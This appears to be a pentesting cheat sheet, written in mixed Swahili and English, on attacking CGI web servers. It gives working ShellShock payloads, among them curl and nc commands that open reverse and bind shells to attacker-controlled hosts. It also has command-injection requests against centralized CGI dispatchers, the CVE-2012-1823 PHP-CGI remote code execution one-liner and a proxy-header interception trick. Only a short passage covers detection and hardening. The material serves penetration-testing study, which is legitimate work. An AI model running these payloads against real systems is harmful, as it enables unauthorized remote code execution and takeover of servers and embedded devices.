CGI Pentesting

Reading time: 6 minutes

Taarifa

The CGI scripts are perl scripts, hivyo, ikiwa umepata udhibiti wa server inayoweza kutekeleza .cgi scripts unaweza kupakia a perl reverse shell (/usr/share/webshells/perl/perl-reverse-shell.pl), kubadilisha extension kutoka .pl hadi .cgi, kumpa execute permissions (chmod +x) na kupata reverse shell kutoka kwa web browser ili kuitekeleza. Ili kujaribu kwa CGI vulns inashauriwa kutumia nikto -C all (na plugins zote)

ShellShock

ShellShock ni vulnerability inayogusa shell ya amri inayotumika sana Bash katika mifumo ya uendeshaji ya Unix-based. Inalenga uwezo wa Bash kutekeleza amri zinazopitishwa na applications. Udhaifu uko katika udhibiti wa environment variables, ambazo ni thamani zilizopewa majina zinazobadilika na zinaathiri jinsi process zinavyotekelezwa kwenye kompyuta. Washambuliaji wanaweza kutengeneza udhaifu huu kwa kuambatanisha msimbo hatari kwenye environment variables, ambao hutekelezwa wakati variable inapopokelewa. Hii inamruhusu mshambuliaji kuathiri mfumo.

Kwa kutumia udhaifu huu ukurasa unaweza kurudisha kosa.

Unaweza kupata udhaifu huu kwa kuona kuwa inatumia old Apache version na cgi_mod (na cgi folder) au kwa kutumia nikto.

Test

Mitihani mingi inategemea kutoa echo ya kitu na kutarajia kwamba mnyororo huo urudi katika response ya web. Ikiwa unadhani ukurasa unaweza kuwa vulnerable, tafuta kurasa zote za cgi na zipime.

Nmap

nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi

Curl (reflected, blind and out-of-band)

# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
# Blind with sleep (you could also make a ping or web request to yourself and monitor that oth tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi
# Out-Of-Band Use Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh

Shellsocker

python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi

Exploit

#Bind Shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 8
#Reverse shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell using curl
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi
#Reverse shell using metasploit
> use multi/http/apache_mod_cgi_bash_env_exec
> set targeturi /cgi-bin/admin.cgi
> set rhosts 10.1.2.11
> run

Wasambazaji wa CGI waliowekwa kati (single endpoint routing via selector parameters)

UI nyingi za wavuti zilizojengewa ndani huunganisha vitendo vingi vyenye ruhusa nyuma ya single CGI endpoint (kwa mfano, /cgi-bin/cstecgi.cgi) na hutumia selector parameter kama topicurl=<handler> kupeleka ombi kwa kazi ya ndani.

Mbinu za kuchukua faida ya router hizi:

• Orodhesha majina ya handler: scrape JS/HTML, brute-force kwa wordlists, au unpack firmware na grep kwa handler strings zinazotumiwa na dispatcher.
• Jaribu ufikikaji bila uthibitisho (unauthenticated reachability): baadhi ya handlers huzisahau cheki za auth na zinaweza kuitwa moja kwa moja.
• Lenga handlers zinazowaita system utilities au kugusa files; validators dhaifu mara nyingi huwazuia herufi chache tu na huenda ikakosa hyphen ya mwanzoni -.

Aina za generic exploit:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

# 1) Option/flag injection (no shell metacharacters): flip argv of downstream tools
topicurl=<handler>&param=-n

# 2) Parameter-to-shell injection (classic RCE) when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;

# 3) Validator bypass → arbitrary file write in file-touching handlers
topicurl=setWizardCfg&<crafted_fields>=/etc/init.d/S99rc

Utambuzi na kuimarisha usalama:

• Angalia maombi yasiyo na uthibitisho kwa endpoints za CGI za kati na topicurl imewekwa kwa handlers nyeti.
• Tambua vigezo vinavyoanza na - (jaribio la argv option injection).
• Wauzaji: weka uthibitisho kwa handlers zote zinazobadilisha state, thibitisha kwa kutumia allowlists/aina/urefu kali, na kamwe usipitishe nyuzi zilizo chini ya udhibiti wa mtumiaji kama command-line flags.

PHP ya zamani + CGI = RCE (CVE-2012-1823, CVE-2012-2311)

Kwa kifupi, ikiwa cgi iko active na php ni "old" (<5.3.12 / < 5.4.2) unaweza execute code. Ili ku-exploit hii vulnerability unahitaji kufikia baadhi ya faili za PHP za web server bila kutuma parameters (hasa bila kutuma tabia "="). Kisha, ili kujaribu hii vulnerability, unaweza kufikia kwa mfano /index.php?-s (angalia -s) na source code ya application itaonekana kwenye response.

Kisha, ili kupata RCE unaweza kutuma query maalum: /?-d allow_url_include=1 -d auto_prepend_file=php://input na PHP code itakayotekelezwa iko katika mwili wa request. Mfano:

curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"

Taarifa zaidi kuhusu vuln na possible exploits: https://www.zero-day.cz/database/337/, cve-2012-1823, cve-2012-2311, CTF Writeup Example.

Proxy (MitM to Web server requests)

CGI huunda variable ya mazingira kwa kila header katika http request. Kwa mfano: "host:web.com" huundwa kama "HTTP_HOST"="web.com"

Kwa kuwa variable ya HTTP_PROXY inaweza kutumika na web server. Jaribu kutuma header yenye: "Proxy: <IP_attacker>:<PORT>" na ikiwa server itafanya ombi lolote wakati wa session, utaweza kunasa kila ombi linalofanywa na server.

Marejeo

• Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered